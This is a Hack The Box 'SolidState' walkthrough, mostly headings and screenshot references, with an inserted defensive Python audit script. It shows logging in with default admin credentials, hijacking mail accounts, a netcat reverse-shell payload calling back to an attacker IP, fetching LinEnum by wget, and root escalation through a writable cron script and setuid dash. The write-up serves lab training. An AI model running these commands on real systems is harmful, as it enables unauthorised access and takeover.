Linux Boxes

solidstate

  1. nmap
    1. all ports
  2. port 4555
    1. telnet
    2. listusers
    3. setpassword
  3. port 110 POP
    1. james/no emails
    2. thomas/no emails
    3. mailadmin/no emails
    4. john
      1. email 1
    5. mindy
      1. email 1
      2. email 2
  4. ssh mindy@10.10.10.51
    1. User.txt
  5. james apache server OSI
    1. searchsploit
    2. 35513.py RCE
      1. run
      2. Reverse Shell
  6. privesc
    1. enumeration
      1. LinEnum
        1. report
          1. system
          2. Users/Groups
          3. Environmental
          4. Jobs/Tasks
          5. Networking
          6. Services
          7. Software
          8. Interesting
    2. /opt/tmp.py
      1. /tmp/st0ve
      2. add setuid bit to DASH
        1. root.txt
  7. lessons learned

solidstate

images/395-1.png
images/395-2.png

nmap

images/396-1.png
Note
ssh service OpenSSH 7.4p1 is running on port 22
smtp service JAMES smtpd 2.3.2 is running on port 25
tcp service Apache 2.4.25 is running on port 80
pop3 service JAMES pop3d 2.3.2 is running on port 110
nntp service JAMES nntpd is running on port 119

all ports

images/398-1.png

there's a service rsip running on port 4555

port 4555

doing an all-port scan reveals an interesting service on port 4555....
Using the default credentials root:root logs us in:

It appears the RSIP service is connected to the server's POP service
images/399-1.png
JAMES REMOTE ADMIN TOOL 2.3.2

images/399-2.png

telnet

let's telnet to the rsip service with
telnet 10.10.10.51 4555
images/400-1.png

images/400-2.png

listusers

listusers gives us

images/401-1.png
images/401-2.png

setpassword

we'll reset mindy's password to view her emails with

setpassword <user> <password>
images/402-1.png
be sure to change the password for the other users so we can check their email as well

port 110 POP

We can log into the POP server using the credentials of the users we changed on the James admin tool

images/403-1.png

james/no emails

images/405-1.png
images/405-2.png

No emails from this account

thomas/no emails

images/406-1.png

mailadmin/no emails

images/412-1.png

john

email 1

images/411-1.png

mindy

images/408-1.png

email 1

images/409-1.png

email 2

images/410-1.png
P@55W0rd1!2@ for SSH

ssh mindy@10.10.10.51

images/413-1.png

images/413-2.png

Problem is we are in a restricted Bash (rbash) environment thanks to John, so we'll have to escape it somehow...
images/413-3.png

We should search around on Google to see if there are any exploits for James Admin 2.3.2

User.txt

images/414-1.png
images/414-2.png
914d0a4ebc177889b5b89a23f556fd75

james apache server OSI

Lets use google
images/415-1.png

images/415-2.png

images/415-3.png

searchsploit

we have the exploit-db id of the exploit, so let's take a look at it on our attack machine
images/417-1.png

35513.py is the same program from our Google search; let's move it to our working directory:

images/417-2.png

we can also use

searchsploit -m /exploits/linux/remote/35513.py to copy the exploit

35513.py RCE

Put a reverse shell in the payload to connect back to our attack machine:

payload = nc -e /bin/sh 10.10.10.62 8000
images/418-1.png

run

images/420-1.png

perfect.... we just need to log in for our payload to run:
remember mindy's password from her emails was P@55W0rd1!2@
images/420-2.png

Reverse Shell


images/421-1.png

success! let's spawn a tty shell real fast and we're in business!
python -c 'import pty;pty.spawn("/bin/bash")'
images/421-2.png

and implement tab autocomplete as well: (use fg for foreground)

ctrl+z to background
stty raw -echo for tab-autocomplete to work on our shell
fg to foreground

images/421-3.png

privesc

enumeration

Let's start by uploading LinEnum to the box: (or lse.sh if you prefer)
images/423-1.png

LinEnum

use wget to download LinEnum onto our victim

wget 10.10.14.62:8001/LinEnum.sh
images/424-1.png

We find from the search there is a world-writable file called tmp.py we can work with that is OWNED BY ROOT and executable by anyone!
images/424-2.png

report

Specify -t for a thorough scan!

./LinEnum.sh -t
images/425-1.png
images/425-2.png

system

images/426-1.png
images/426-2.png


Users/Groups

images/427-1.png


images/427-2.png
images/427-3.png

images/427-4.png
images/427-5.png

images/427-6.png
images/427-7.png


Environmental

images/428-1.png

images/428-2.png
images/428-3.png
images/428-4.png

Jobs/Tasks

images/429-1.png
images/429-2.png

images/429-3.png

images/429-4.png
images/429-5.png

Networking

images/430-1.png

images/430-2.png

images/430-3.png
images/430-4.png

images/430-5.png

images/430-6.png

images/430-7.png

Services

images/431-1.png

images/431-2.png

Software

images/432-1.png

Interesting

images/433-1.png
images/433-2.png
images/433-3.png
images/433-4.png

images/433-5.png

/opt/tmp.py

Checking out the contents of tmp.py
images/434-1.png

we see that touch is installed on the box, so we can use it:
images/434-2.png

we can rewrite tmp.py with the code:
#!/bin/bash
/usr/bin/touch /tmp/st0ve


let's have /opt/tmp.py touch the file /tmp/st0ve to see whether the file gets created with root ownership:


/tmp/st0ve

we can see the file st0ve was created owned by root by the touch program, so we know the cron job is running tmp.py as root


images/435-1.png

add setuid bit to DASH

we see that dash is not symlinked (symbolically linked) to bash on this box, which means it's a binary independent of bash, but more importantly...

dash does NOT drop the setuid privilege like bash does, so if we add the setuid bit to dash we can run it as though we were root!


images/436-1.png



rewriting tmp.py to run chmod 4755 /bin/dash, so the cron job puts the setuid bit on the dash binary as root


images/436-2.png

now simply run /bin/dash and we pop a shell with root privileges!
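To make the privesc chain above checkable from the defender's side, here is an added example (not from the original notes, not LinEnum code) that reads an /etc/crontab-style file, flags any script a cron user runs that anyone can overwrite, and flags shells carrying setuid root; the sample crontab and file modes are constructed to mirror the box.

```python
"""Audit for the weaknesses chained above: a root-owned, world-writable script
run from cron, and a setuid bit on /bin/dash. Added example; sample data is constructed."""
import os
import re
import stat
from collections import namedtuple
SHELLS = ("/bin/dash", "/bin/sh", "/bin/bash")  # setuid root on any of these = root shell


def live_stat(path):
    """os.stat that returns None instead of raising for a missing path."""
    try:
        return os.stat(path)
    except FileNotFoundError:
        return None


def scripts_from_crontab(crontab_text):
    """Return (user, path) for each absolute path in /etc/crontab-style lines
    (five time fields, then the user, then the command)."""
    found = []
    for line in crontab_text.splitlines():
        fields = line.split(None, 6)
        if len(fields) < 7 or fields[0].startswith("#") or "=" in fields[0]:
            continue  # blank, comment or VAR=value line
        for path in re.findall(r"(?<![\w/])/[\w./-]+", fields[6]):
            found.append((fields[5], path))
    return found


def audit(crontab_text, stat_fn=live_stat):
    """Flag cron scripts anyone can overwrite and shells carrying setuid root.
    stat_fn defaults to the live filesystem; the demo swaps in a dict lookup."""
    findings = []
    for user, path in scripts_from_crontab(crontab_text):
        st = stat_fn(path)
        if st is not None and st.st_mode & stat.S_IWOTH:
            findings.append("cron as %s runs world-writable %s" % (user, path))
    for shell in SHELLS:
        st = stat_fn(shell)
        if st is not None and st.st_mode & stat.S_ISUID and st.st_uid == 0:
            findings.append("setuid root shell: %s" % shell)
    return findings


# Constructed snapshot of the box after the steps above (not real stat output).
FakeStat = namedtuple("FakeStat", "st_uid st_mode")
SAMPLE_FS = {"/opt/tmp.py": FakeStat(0, stat.S_IFREG | 0o777),
             "/bin/dash": FakeStat(0, stat.S_IFREG | 0o4755),
             "/bin/bash": FakeStat(0, stat.S_IFREG | 0o755)}
SAMPLE_CRONTAB = ("SHELL=/bin/sh\n*/3 * * * * root /opt/tmp.py\n"
                  "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n")
sample_stat = SAMPLE_FS.get  # None for paths the snapshot does not contain
```

Running audit() with the default stat_fn against the real /etc/crontab gives the same two findings on a box configured like this one; both go away once tmp.py is no longer world-writable and the setuid bit is removed from dash.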

root.txt

images/437-1.png

b4c9723a28899b1c45db281d99cc87c9

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/

images/1962-1.png